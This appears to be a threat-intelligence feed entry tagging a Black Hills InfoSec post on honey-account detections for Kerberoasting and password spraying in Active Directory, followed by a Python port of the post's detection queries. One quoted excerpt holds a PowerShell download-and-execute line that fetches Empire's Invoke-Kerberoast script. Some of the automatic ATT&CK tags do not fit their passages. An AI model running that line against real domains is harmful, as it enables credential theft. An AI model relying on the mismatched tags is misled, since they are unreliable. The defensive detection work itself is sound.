TTPwire Vol. 1 · MITRE ATT&CK-Tagged


Black Hills InfoSec

One Active Directory Account Can Be Your Best Early Warning

BHIS · 2025-01-16

ATT&CK techniques detected (11 predictions)

T1110.003 Password Spraying · 99%
  "'Status">' Status "<" * | where Status == '0x0' | parse EventData with * 'ServiceName">' ServiceName "<" * | where ServiceName !contains "$" and ServiceName contains "ricardo" | parse EventData with * 'IpAddress">' SourceIp "<" * | project TimeGenerated, …"

T1558.003 Kerberoasting · 81%
  "Registered SPN? Badda bing, password hash. <PowerShell command block> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invo…"

T1558.003 Kerberoasting · 71%
  ", Account, IpAddress </Kusto Query Language> Super easy detection here, and if you operate this account like you should, which is almost not at all, this also produces a high-fidelity detection for malicious activity. After building an alert for the failed login query against e…"

T1558.003 Kerberoasting · 69%
  "material does not describe that process, but alert rules were created to support claims made herein, during the creation of the content. Next up, let's add an SPN to Ricardo's account. One command, easy peasy to make this account Kerberoastable. If you are unaware, this is an…"

T1548.002 Bypass User Account Control · 59%
  "the next screenshot, a valid login for our honey account contains the normalized account name, human readable, and easily searchable. With a bit more audit configuration, we can capture an additional event ID for comparison. The following PowerShell will grab a copy of open threa…"

T1059.001 PowerShell · 50%
  "de6-11d0-a285-00aa003049e2 -AuditFlags Success </PowerShell command block> We can use PowerShell to validate the configuration of our audit rule. <PowerShell command block> $acl = Get-Acl -Path "AD:CN=ricardo.beneficio,OU=DomainUsers,DC=doazlab,DC=…"

T1558.004 AS-REP Roasting · 49%
  "- Conduct the Kerberoasting attack. - Password spray the AD users in the environment. And, with one last summary of the alerts, we should see all this activity. Thanks for reading as always. Reach out with questions about the content and material, we are pretty sure you all kno…"

T1558.003 Kerberoasting · 44%
  (same passage as the 49% T1558.004 prediction above)

T1558.004 AS-REP Roasting · 40%
  (same passage as the 71% T1558.003 prediction above)

T1087.004 Cloud Account · 35%
  "something like the screenshot below when your builder completes. If you've never seen Azure, just search for your public IPs. Click on any of the objects to get an overview of the assigned IP and DNS record. The IP and DNS details for the blog environment are shown below. Shoul…"

T1087.002 Domain Account · 35%
  (same passage as the T1087.004 prediction above)
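The three honey-account rules the tagged passages describe (the Kusto query that keeps successful 4769 requests whose ServiceName is the honey account and not a machine account, the failed-login alert on that account, and the rule that any valid logon of an account nobody should use is itself high-fidelity), run in Python over constructed Windows Security events, as an added example that is not code from the BHIS post. The account name ricardo.beneficio and the doazlab domain come from the post; the sample events are constructed, and the choice of 4771/4625 and 4624 as the failed- and successful-logon event IDs, plus the per-source fan-out rule that flags a spray even when the honey account is missed, are this example's assumptions rather than the post's.

```python
# Added example (not code from the BHIS post): the post's honey-account
# detections re-implemented in Python over constructed Windows Security
# events so they run offline. ricardo.beneficio and doazlab come from the
# post; the sample events and the choice of 4771/4625 and 4624 as the
# failed- and successful-logon event IDs are this example's assumptions.
from collections import defaultdict
import xml.etree.ElementTree as ET

HONEY_ACCOUNT = "ricardo.beneficio"  # honey account named in the post
FAILED_LOGON_IDS = {4771, 4625}      # Kerberos pre-auth failure, logon failure (assumption)
SUCCESS_LOGON_IDS = {4624}           # successful logon (assumption)


def _event(event_id, time, **data):
    """Constructed Security event in Windows' XML shape (namespace omitted)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f"<Event><System><EventID>{event_id}</EventID>"
            f'<TimeCreated SystemTime="{time}"/></System>'
            f"<EventData>{fields}</EventData></Event>")


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    # TGS request for the honey account's SPN, RC4 (0x17): the Kerberoast signal
    _event(4769, "2025-01-16T10:01:00Z", TargetUserName="jdoe@DOAZLAB.COM",
           ServiceName="ricardo.beneficio", TicketEncryptionType="0x17",
           Status="0x0", IpAddress="::ffff:10.0.0.25"),
    # Routine TGS request for a computer account: dropped by the "$" filter
    _event(4769, "2025-01-16T10:01:05Z", TargetUserName="jdoe@DOAZLAB.COM",
           ServiceName="DC01$", TicketEncryptionType="0x12",
           Status="0x0", IpAddress="::ffff:10.0.0.25"),
    # Failed TGS request for the honey SPN: dropped by the Status == 0x0 filter
    _event(4769, "2025-01-16T10:01:09Z", TargetUserName="jdoe@DOAZLAB.COM",
           ServiceName="ricardo.beneficio", Status="0x1b",
           IpAddress="::ffff:10.0.0.25"),
    # Password spray: one source, pre-auth failures across several accounts,
    # including the honey account that nobody should ever log on as
    _event(4771, "2025-01-16T10:02:00Z", TargetUserName="asmith",
           Status="0x18", IpAddress="::ffff:10.0.0.99"),
    _event(4771, "2025-01-16T10:02:05Z", TargetUserName="bjones",
           Status="0x18", IpAddress="::ffff:10.0.0.99"),
    _event(4771, "2025-01-16T10:02:10Z", TargetUserName="ricardo.beneficio",
           Status="0x18", IpAddress="::ffff:10.0.0.99"),
    # One real user mistyping a password: neither a spray nor the honey account
    _event(4771, "2025-01-16T10:03:00Z", TargetUserName="asmith",
           Status="0x18", IpAddress="::ffff:10.0.0.7"),
    # The spray source then logs on as the honey account: high-fidelity alert
    _event(4624, "2025-01-16T10:05:00Z", TargetUserName="ricardo.beneficio",
           LogonType="3", IpAddress="::ffff:10.0.0.99"),
]


def parse_event(xml_text):
    """Flatten one event into a dict, like the KQL 'parse EventData with *'."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.findtext("System/EventID")),
             "TimeGenerated": root.find("System/TimeCreated").get("SystemTime")}
    for data in root.iter("Data"):
        event[data.get("Name")] = data.text or ""
    return event


def _row(e):  # the columns the post's query projects
    return (e["TimeGenerated"], e.get("TargetUserName", ""), e.get("IpAddress", ""))


def detect_kerberoast(events, honey=HONEY_ACCOUNT):
    """Port of the post's query: 4769, Status 0x0, ServiceName that is not a
    machine account and names the honey account (compared lowercased, as
    KQL 'contains' is case-insensitive)."""
    return [_row(e) for e in events
            if e["EventID"] == 4769 and e.get("Status") == "0x0"
            and "$" not in e.get("ServiceName", "")
            and honey in e.get("ServiceName", "").lower()]


def detect_honey_logons(events, honey=HONEY_ACCOUNT):
    """Every logon attempt against the honey account, split failed/successful."""
    failed, success = [], []
    for e in events:
        if e.get("TargetUserName", "").lower() != honey:
            continue
        if e["EventID"] in FAILED_LOGON_IDS:
            failed.append(_row(e))
        elif e["EventID"] in SUCCESS_LOGON_IDS:
            success.append(_row(e))
    return failed, success


def detect_spray_sources(events, min_accounts=3):
    """Sources whose failures fan out over >= min_accounts distinct users."""
    targets = defaultdict(set)
    for e in events:
        if e["EventID"] in FAILED_LOGON_IDS:
            targets[e.get("IpAddress", "")].add(e.get("TargetUserName", "").lower())
    return {ip: len(u) for ip, u in targets.items() if len(u) >= min_accounts}


def run_detections(xml_events):
    """Run the three honey-account rules plus the spray fan-out over raw events."""
    events = [parse_event(x) for x in xml_events]
    failed, success = detect_honey_logons(events)
    return {"kerberoast": detect_kerberoast(events),
            "honey_failed_logon": failed,
            "honey_successful_logon": success,
            "spray_sources": detect_spray_sources(events)}
```

On the sample set, `run_detections(SAMPLE_EVENTS)` returns one Kerberoast hit (the RC4 TGS request for the honey SPN; the computer-account request and the failed request are filtered exactly as the post's `!contains "$"` and `Status == '0x0'` clauses do), one failed and one successful honey-account logon, both from the spraying source, and that source as the only spray candidate. The fan-out rule exists because a spray that happens to skip the honey account leaves no honey signal at all; the per-source distinct-target count catches that case at the cost of a threshold to tune.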

Summary

Here we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that, if implemented properly, will catch common adversarial activities […]

The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security, Inc.